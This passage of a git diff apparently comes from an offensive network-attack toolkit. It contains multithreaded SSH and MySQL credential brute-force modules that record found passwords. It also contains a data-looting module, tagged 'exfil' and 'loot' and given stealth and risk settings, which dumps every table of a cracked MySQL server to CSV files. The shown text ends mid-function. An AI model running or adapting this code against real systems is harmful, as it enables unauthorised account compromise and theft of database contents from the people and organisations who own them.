# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread to process SQL bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
try:
success, databases = self.sql_connect(adresse_ip, user, password, port=port)
if success:
with self.lock:
for dbname in databases:
self.results.append([adresse_ip, user, password, port, dbname])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "databases": str(len(databases))}
self.save_results()
self.remove_duplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_sql", 0) > 0:
time.sleep(self.shared_data.timewait_sql)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SQL dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
# pour chaque DB trouvée, créer/mettre à jour une ligne dans creds (service='sql', database=<dbname>)
for ip, user, password, port, dbname in self.results:
mac = self.mac_for_ip(ip)
hostname = self.hostname_for_ip(ip) or ""
try:
self.shared_data.db.insert_cred(
service="sql",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=dbname,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=dbname
)
else:
logger.error(f"insert_cred failed for {ip} {user} db={dbname}: {e}")
self.results = []
def remove_duplicates(self):
# inutile avec l’index unique; conservé pour compat.
pass
if __name__ == "__main__":
try:
sd = SharedData()
sql_bruteforce = SQLBruteforce(sd)
logger.info("SQL brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,204 +0,0 @@
import os
import pandas as pd
import pymysql
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SQLBruteforce"
b_module = "sql_connector"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
class SQLBruteforce:
"""
Class to handle the SQL brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_connector = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""
Run the SQL brute force attack on the given IP and port.
"""
return self.sql_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.load_scan_file()
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sqlfile = shared_data.sqlfile
if not os.path.exists(self.sqlfile):
with open(self.sqlfile, "w") as f:
f.write("IP Address,User,Password,Port,Database\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the scan file and filter it for SQL ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3306", na=False)]
def sql_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SQL service using the given credentials without specifying a database.
"""
try:
# Première tentative sans spécifier de base de données
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
# Si la connexion réussit, récupérer la liste des bases de données
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
conn.close()
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
# Sauvegarder les informations avec la liste des bases trouvées
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
# Ajouter une entrée pour chaque base de données trouvée
for db in databases:
self.results.append([adresse_ip, user, password, port, db])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file()
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SQL...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['IP Address', 'User', 'Password', 'Port', 'Database'])
df.to_csv(self.sqlfile, index=False, mode='a', header=not os.path.exists(self.sqlfile))
logger.info(f"Saved results to {self.sqlfile}")
self.results = []
def remove_duplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sqlfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sqlfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
sql_bruteforce = SQLBruteforce(shared_data)
logger.info("[bold green]Starting SQL brute force attack on port 3306[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
sql_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(sql_bruteforce.sql_connector.results)}")
exit(len(sql_bruteforce.sql_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

327
actions/ssh_bruteforce.py Normal file
View File

@@ -0,0 +1,327 @@
"""
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
to find accessible accounts using various user credentials. It logs the results of
successful connections.
SQL version (minimal changes):
- Targets still provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
"""
import os
import paramiko
import socket
import threading
import logging
import time
import datetime
from queue import Queue
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)
# Silence Paramiko internals
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys",
"paramiko.kex", "paramiko.auth_handler"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_bruteforce"
b_status = "brute_force_ssh"
b_port = 22
b_service = '["ssh"]'
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
b_parent = None
b_priority = 70 # tu peux ajuster la priorité si besoin
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class SSHBruteforce:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_bruteforce = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""Run the SSH brute force attack on the given IP and port."""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Execute the brute force attack and update status (for UI badge)."""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjorn_orch_status = "SSHBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": port}
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""Handles the connection attempts and DB persistence."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Load wordlists (unchanged behavior)
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Build initial IP -> (MAC, hostname) cache from DB
self._ip_to_identity = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results = [] # List of tuples (mac, ip, hostname, user, password, port)
self.queue = Queue()
self.progress = None
# ---- Mapping helpers (DB) ------------------------------------------------
def _refresh_ip_identity_cache(self):
"""Load IPs from DB and map them to (mac, current_hostname)."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---- File utils ----------------------------------------------------------
@staticmethod
def _read_lines(path: str):
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---- SSH core ------------------------------------------------------------
def ssh_connect(self, adresse_ip, user, password, port=b_port, timeout=10):
"""Attempt to connect to SSH using (user, password)."""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
timeout = float(getattr(self.shared_data, "ssh_connect_timeout_s", timeout))
try:
ssh.connect(
hostname=adresse_ip,
username=user,
password=password,
port=port,
timeout=timeout,
auth_timeout=timeout,
banner_timeout=timeout,
look_for_keys=False, # avoid slow key probing
allow_agent=False, # avoid SSH agent delays
)
return True
except (paramiko.AuthenticationException, socket.timeout, socket.error, paramiko.SSHException):
return False
except Exception as e:
logger.debug(f"SSH connect unexpected error {adresse_ip} {user}: {e}")
return False
finally:
try:
ssh.close()
except Exception:
pass
# ---- Robust DB upsert fallback ------------------------------------------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
"""
Insert-or-update without relying on ON CONFLICT columns.
Works even if your UNIQUE index uses expressions (e.g., COALESCE()).
"""
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
# 1) Insert if missing
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('ssh',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
# 2) Update password/hostname if present (or just inserted)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='ssh'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---- Worker / Queue / Threads -------------------------------------------
def worker(self, success_flag):
"""Worker thread to process items in the queue (bruteforce attempts)."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.ssh_connect(adresse_ip, user, password, port=port):
with self.lock:
# Persist success into DB.creds
try:
self.shared_data.db.insert_cred(
service="ssh",
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
# Specific fix: fallback manual upsert
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac_address,
ip=adresse_ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None
)
else:
logger.error(f"insert_cred failed for {adresse_ip} {user}: {e}")
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_ssh", 0) > 0:
time.sleep(self.shared_data.timewait_ssh)
def run_bruteforce(self, adresse_ip, port):
"""
Called by the orchestrator with a single IP + port.
Builds the queue (users x passwords) and launches threads.
"""
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SSH dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("SSH brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,198 +0,0 @@
"""
ssh_connector.py - This script performs a brute force attack on SSH services (port 22) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import paramiko
import socket
import threading
import logging
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_connector"
b_status = "brute_force_ssh"
b_port = 22
b_parent = None
class SSHBruteforce:
"""
Class to handle the SSH brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_connector = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""
Run the SSH brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "SSHBruteforce"
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sshfile = shared_data.sshfile
if not os.path.exists(self.sshfile):
logger.info(f"File {self.sshfile} does not exist. Creating...")
with open(self.sshfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SSH ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("22", na=False)]
def ssh_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SSH service using the given credentials.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(adresse_ip, username=user, password=password, banner_timeout=200) # Adjust timeout as necessary
return True
except (paramiko.AuthenticationException, socket.error, paramiko.SSHException):
return False
finally:
ssh.close() # Ensure the SSH connection is closed
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ssh_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SSH...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.sshfile, index=False, mode='a', header=not os.path.exists(self.sshfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sshfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sshfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ssh_bruteforce = SSHBruteforce(shared_data)
logger.info("Démarrage de l'attaque SSH... sur le port 22")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing SSHBruteforce on {ip}...")
ssh_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(ssh_bruteforce.ssh_connector.results)}")
exit(len(ssh_bruteforce.ssh_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

View File

@@ -1,189 +1,252 @@
"""
steal_data_sql.py — SQL data looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
- DB.creds (service='sql') provides (user,password, database?).
- We connect first without DB to enumerate tables (excluding system schemas),
then connect per schema to export CSVs.
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
"""
import os
import pandas as pd
import logging
import time
from sqlalchemy import create_engine
from rich.console import Console
import csv
from threading import Timer
from typing import List, Tuple, Dict, Optional
from sqlalchemy import create_engine, text
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealDataSQL"
b_class = "StealDataSQL"
b_module = "steal_data_sql"
b_status = "steal_data_sql"
b_parent = "SQLBruteforce"
b_port = 3306
b_port = 3306
b_trigger = 'on_any:["on_cred_found:sql","on_service:sql"]'
b_requires = '{"all":[{"has_cred":"sql"},{"has_port":3306},{"max_concurrent":2}]}'
# Scheduling / limits
b_priority = 60 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "1/86400" # at most 3 executions/day per host (extra guard)
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
class StealDataSQL:
"""
Class to handle the process of stealing data from SQL servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
logger.info("StealDataSQL initialized.")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.sql_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealDataSQL initialized.")
def connect_sql(self, ip, username, password, database=None):
"""
Establish a MySQL connection using SQLAlchemy.
"""
# -------- Identity cache (hosts) --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Credentials (creds table) --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str, Optional[str]]]:
"""
Return list[(user,password,database)] for SQL service.
Prefer exact IP; also include by MAC if known. Dedup by (u,p,db).
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='sql'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
d = row.get("database")
d = str(d).strip() if d is not None else None
key = (u, p, d or "")
if not u or (key in seen):
continue
seen.add(key)
out.append((u, p, d))
return out
# -------- SQL helpers --------
def connect_sql(self, ip: str, username: str, password: str, database: Optional[str] = None):
try:
# Si aucune base n'est spécifiée, on se connecte sans base
db_part = f"/{database}" if database else ""
connection_str = f"mysql+pymysql://{username}:{password}@{ip}:3306{db_part}"
engine = create_engine(connection_str, connect_args={"connect_timeout": 10})
conn_str = f"mysql+pymysql://{username}:{password}@{ip}:{b_port}{db_part}"
engine = create_engine(conn_str, connect_args={"connect_timeout": 10})
# quick test
with engine.connect() as _:
pass
self.sql_connected = True
logger.info(f"Connected to {ip} via SQL with username {username}" + (f" to database {database}" if database else ""))
logger.info(f"Connected SQL {ip} as {username}" + (f" db={database}" if database else ""))
return engine
except Exception as e:
logger.error(f"SQL connection error for {ip} with user '{username}' and password '{password}'" + (f" to database {database}" if database else "") + f": {e}")
logger.error(f"SQL connect error {ip} {username}" + (f" db={database}" if database else "") + f": {e}")
return None
def find_tables(self, engine):
"""
Find all tables in all databases, excluding system databases.
Returns list of (table_name, schema_name) excluding system schemas.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Table search interrupted due to orchestrator exit.")
logger.info("Table search interrupted.")
return []
query = """
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_SCHEMA NOT IN ('information_schema', 'mysql', 'performance_schema', 'sys')
AND TABLE_TYPE = 'BASE TABLE'
"""
df = pd.read_sql(query, engine)
tables = df[['TABLE_NAME', 'TABLE_SCHEMA']].values.tolist()
logger.info(f"Found {len(tables)} tables across all databases")
return tables
q = text("""
SELECT TABLE_NAME, TABLE_SCHEMA
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE='BASE TABLE'
AND TABLE_SCHEMA NOT IN ('information_schema','mysql','performance_schema','sys')
""")
with engine.connect() as conn:
rows = conn.execute(q).fetchall()
return [(r[0], r[1]) for r in rows]
except Exception as e:
logger.error(f"Error finding tables: {e}")
logger.error(f"find_tables error: {e}")
return []
def steal_data(self, engine, table, schema, local_dir):
"""
Download data from the table in the database to a local file.
"""
def steal_data(self, engine, table: str, schema: str, local_dir: str) -> None:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("Data stealing process interrupted due to orchestrator exit.")
logger.info("Data steal interrupted.")
return
query = f"SELECT * FROM {schema}.{table}"
df = pd.read_sql(query, engine)
local_file_path = os.path.join(local_dir, f"{schema}_{table}.csv")
df.to_csv(local_file_path, index=False)
logger.success(f"Downloaded data from table {schema}.{table} to {local_file_path}")
q = text(f"SELECT * FROM `{schema}`.`{table}`")
with engine.connect() as conn:
result = conn.execute(q)
headers = result.keys()
os.makedirs(local_dir, exist_ok=True)
out = os.path.join(local_dir, f"{schema}_{table}.csv")
with open(out, "w", newline="", encoding="utf-8") as f:
writer = csv.writer(f)
writer.writerow(headers)
for row in result:
writer.writerow(row)
logger.success(f"Dumped {schema}.{table} -> {out}")
except Exception as e:
logger.error(f"Error downloading data from table {schema}.{table}: {e}")
logger.error(f"Dump error {schema}.{table}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal data from the remote SQL server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''):
self.shared_data.bjornorch_status = "StealDataSQL"
time.sleep(5)
logger.info(f"Stealing data from {ip}:{port}...")
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
sqlfile = self.shared_data.sqlfile
credentials = []
if os.path.exists(sqlfile):
df = pd.read_csv(sqlfile)
# Filtrer les credentials pour l'IP spécifique
ip_credentials = df[df['IP Address'] == ip]
# Créer des tuples (username, password, database)
credentials = [(row['User'], row['Password'], row['Database'])
for _, row in ip_credentials.iterrows()]
